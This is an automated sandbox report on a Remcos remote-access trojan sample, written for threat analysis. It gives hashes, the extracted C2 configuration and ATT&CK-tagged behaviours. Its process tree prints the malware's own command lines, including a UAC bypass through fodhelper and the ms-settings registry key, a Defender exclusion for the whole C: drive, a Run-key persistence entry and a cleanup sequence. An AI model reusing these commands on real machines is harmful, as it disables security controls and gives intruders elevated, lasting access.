Analysis
-
max time kernel
149s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
25-07-2024 08:07
Static task
static1
Behavioral task
behavioral1
Sample
MalwareBazaar.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
MalwareBazaar.exe
Resource
win10v2004-20240709-en
General
-
Target
MalwareBazaar.exe
-
Size
1.0MB
-
MD5
c9849a6295f2527f02fd7b9a0664d401
-
SHA1
9db9709ad5446150bff3c3a4d193979753904866
-
SHA256
52a6184f61de86b9bfe6abf00bbcf297a308bd91effb754d3bf16fd132384071
-
SHA512
0f330d7bc780dbb1b9ef2bc92e018c29523aca29fda9e3f3f785e4c8f6fc06181e0e4c5bb5ad59f7a34409affa606d9d19c4f13981e8097c95778beef6cbd3ea
-
SSDEEP
24576:E6Dlm/atGKanKxvdwEHfZTX0u/nJaRj9yin1mV/aJscLc:DDcCZfx+GQRjj1mj
Malware Config
Extracted
remcos
RemoteHost
127.0.0.1:52121
officerem.duckdns.org:52121
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-UNX1LL
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Executes dropped EXE 19 IoCs
Processes:
ngtepnyT.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 2124 ngtepnyT.pif 1484 alpha.exe 2676 alpha.exe 3064 alpha.exe 2468 alpha.exe 2840 alpha.exe 1940 alpha.exe 2128 xkn.exe 2336 alpha.exe 1512 ger.exe 2844 alpha.exe 2016 alpha.exe 2268 alpha.exe 2228 alpha.exe 2164 alpha.exe 1148 alpha.exe 1404 alpha.exe 2320 alpha.exe 672 alpha.exe -
Loads dropped DLL 15 IoCs
Processes:
MalwareBazaar.execmd.exealpha.exexkn.exealpha.exepid process 2332 MalwareBazaar.exe 2332 MalwareBazaar.exe 320 cmd.exe 320 cmd.exe 320 cmd.exe 320 cmd.exe 320 cmd.exe 320 cmd.exe 1940 alpha.exe 2128 xkn.exe 2128 xkn.exe 2128 xkn.exe 2336 alpha.exe 320 cmd.exe 320 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
MalwareBazaar.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\Tynpetgn = "C:\\Users\\Public\\Tynpetgn.url" MalwareBazaar.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
MalwareBazaar.exedescription pid process target process PID 2332 set thread context of 2124 2332 MalwareBazaar.exe ngtepnyT.pif -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
extrac32.exeSndVol.exeMalwareBazaar.exengtepnyT.pifdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SndVol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MalwareBazaar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ngtepnyT.pif -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
alpha.exePING.EXEpid process 2016 alpha.exe 1996 PING.EXE -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2092 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings\shell\open\command ger.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
xkn.exeMalwareBazaar.exepid process 2128 xkn.exe 2332 MalwareBazaar.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
xkn.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2128 xkn.exe Token: SeDebugPrivilege 2092 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
SndVol.exepid process 3056 SndVol.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
SndVol.exepid process 3056 SndVol.exe 3056 SndVol.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
MalwareBazaar.exengtepnyT.pifcmd.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exedescription pid process target process PID 2332 wrote to memory of 2124 2332 MalwareBazaar.exe ngtepnyT.pif PID 2332 wrote to memory of 2124 2332 MalwareBazaar.exe ngtepnyT.pif PID 2332 wrote to memory of 2124 2332 MalwareBazaar.exe ngtepnyT.pif PID 2332 wrote to memory of 2124 2332 MalwareBazaar.exe ngtepnyT.pif PID 2332 wrote to memory of 2124 2332 MalwareBazaar.exe ngtepnyT.pif PID 2332 wrote to memory of 2124 2332 MalwareBazaar.exe ngtepnyT.pif PID 2124 wrote to memory of 320 2124 ngtepnyT.pif cmd.exe PID 2124 wrote to memory of 320 2124 ngtepnyT.pif cmd.exe PID 2124 wrote to memory of 320 2124 ngtepnyT.pif cmd.exe PID 2124 wrote to memory of 320 2124 ngtepnyT.pif cmd.exe PID 320 wrote to memory of 576 320 cmd.exe extrac32.exe PID 320 wrote to memory of 576 320 cmd.exe extrac32.exe PID 320 wrote to memory of 576 320 cmd.exe extrac32.exe PID 320 wrote to memory of 1484 320 cmd.exe alpha.exe PID 320 wrote to memory of 1484 320 cmd.exe alpha.exe PID 320 wrote to memory of 1484 320 cmd.exe alpha.exe PID 320 wrote to memory of 2676 320 cmd.exe alpha.exe PID 320 wrote to memory of 2676 320 cmd.exe alpha.exe PID 320 wrote to memory of 2676 320 cmd.exe alpha.exe PID 320 wrote to memory of 3064 320 cmd.exe alpha.exe PID 320 wrote to memory of 3064 320 cmd.exe alpha.exe PID 320 wrote to memory of 3064 320 cmd.exe alpha.exe PID 3064 wrote to memory of 3052 3064 alpha.exe extrac32.exe PID 3064 wrote to memory of 3052 3064 alpha.exe extrac32.exe PID 3064 wrote to memory of 3052 3064 alpha.exe extrac32.exe PID 320 wrote to memory of 2468 320 cmd.exe alpha.exe PID 320 wrote to memory of 2468 320 cmd.exe alpha.exe PID 320 wrote to memory of 2468 320 cmd.exe alpha.exe PID 2468 wrote to memory of 2424 2468 alpha.exe extrac32.exe PID 2468 wrote to memory of 2424 2468 alpha.exe extrac32.exe PID 2468 wrote to memory of 2424 2468 alpha.exe extrac32.exe PID 320 wrote to memory of 2840 320 cmd.exe alpha.exe PID 320 wrote to memory of 2840 320 cmd.exe alpha.exe PID 320 wrote to memory of 2840 320 cmd.exe alpha.exe PID 2840 wrote to memory of 2880 2840 alpha.exe extrac32.exe PID 2840 wrote to memory of 2880 2840 alpha.exe extrac32.exe PID 2840 wrote to memory of 2880 2840 alpha.exe extrac32.exe PID 320 wrote to memory of 1940 320 cmd.exe alpha.exe PID 320 wrote to memory of 1940 320 cmd.exe alpha.exe PID 320 wrote to memory of 1940 320 cmd.exe alpha.exe PID 1940 wrote to memory of 2128 1940 alpha.exe xkn.exe PID 1940 wrote to memory of 2128 1940 alpha.exe xkn.exe PID 1940 wrote to memory of 2128 1940 alpha.exe xkn.exe PID 2128 wrote to memory of 2336 2128 xkn.exe alpha.exe PID 2128 wrote to memory of 2336 2128 xkn.exe alpha.exe PID 2128 wrote to memory of 2336 2128 xkn.exe alpha.exe PID 2336 wrote to memory of 1512 2336 alpha.exe ger.exe PID 2336 wrote to memory of 1512 2336 alpha.exe ger.exe PID 2336 wrote to memory of 1512 2336 alpha.exe ger.exe PID 320 wrote to memory of 2844 320 cmd.exe alpha.exe PID 320 wrote to memory of 2844 320 cmd.exe alpha.exe PID 320 wrote to memory of 2844 320 cmd.exe alpha.exe PID 2844 wrote to memory of 2092 2844 alpha.exe taskkill.exe PID 2844 wrote to memory of 2092 2844 alpha.exe taskkill.exe PID 2844 wrote to memory of 2092 2844 alpha.exe taskkill.exe PID 320 wrote to memory of 2016 320 cmd.exe alpha.exe PID 320 wrote to memory of 2016 320 cmd.exe alpha.exe PID 320 wrote to memory of 2016 320 cmd.exe alpha.exe PID 2016 wrote to memory of 1996 2016 alpha.exe PING.EXE PID 2016 wrote to memory of 1996 2016 alpha.exe PING.EXE PID 2016 wrote to memory of 1996 2016 alpha.exe PING.EXE PID 320 wrote to memory of 2268 320 cmd.exe alpha.exe PID 320 wrote to memory of 2268 320 cmd.exe alpha.exe PID 320 wrote to memory of 2268 320 cmd.exe alpha.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Users\Public\Libraries\ngtepnyT.pifC:\Users\Public\Libraries\ngtepnyT.pif2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A0C2.tmp\A0C3.tmp\A0C4.bat C:\Users\Public\Libraries\ngtepnyT.pif"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"4⤵PID:576
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "4⤵
- Executes dropped EXE
PID:1484 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"4⤵
- Executes dropped EXE
PID:2676 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"5⤵PID:3052
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"5⤵PID:2424
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"5⤵PID:2880
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""7⤵
- Executes dropped EXE
- Modifies registry class
PID:1512 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2092 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 24⤵
- Executes dropped EXE
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1996 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"4⤵
- Executes dropped EXE
PID:2268 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"4⤵
- Executes dropped EXE
PID:2228 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"4⤵
- Executes dropped EXE
PID:2164 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:1148 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:1404 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:2320 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:672 -
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe C:\\Users\\Public\\Libraries\\Tynpetgn.PIF2⤵
- System Location Discovery: System Language Discovery
PID:1476 -
C:\Windows\SysWOW64\SndVol.exeC:\Windows\System32\SndVol.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3056
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
222B
MD55743dbc5062448020c224de468ffbfa5
SHA1a8c031b97d492add4e9fdc0d509d7958ff267a01
SHA25647fa926e8bf438a09ca7db3524682eb690c4412aaceb659a6f35e87d7ba2cd63
SHA512e6f04751f8e3f6ede874fec9de2bc5cc4885eaa5ea20739f268cbcb02955f299d68d2fe2b1468f587d633088a79eb8992787472b50c256246600d6c6432eb46d
-
Filesize
1KB
MD5e62f427202d3e5a3ba60ebe78567918c
SHA16ef0cd5ba6c871815fceb27ff095a7931452b334
SHA25606bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff
SHA512e15148ba4099f3b8c73319be32a5f76226d21e7fb90123bec68e5106d03b7d3e8af8caa0421667920967e8921787ba255dc4bf23d35792bf8e9a20f1e18283c6
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
Filesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d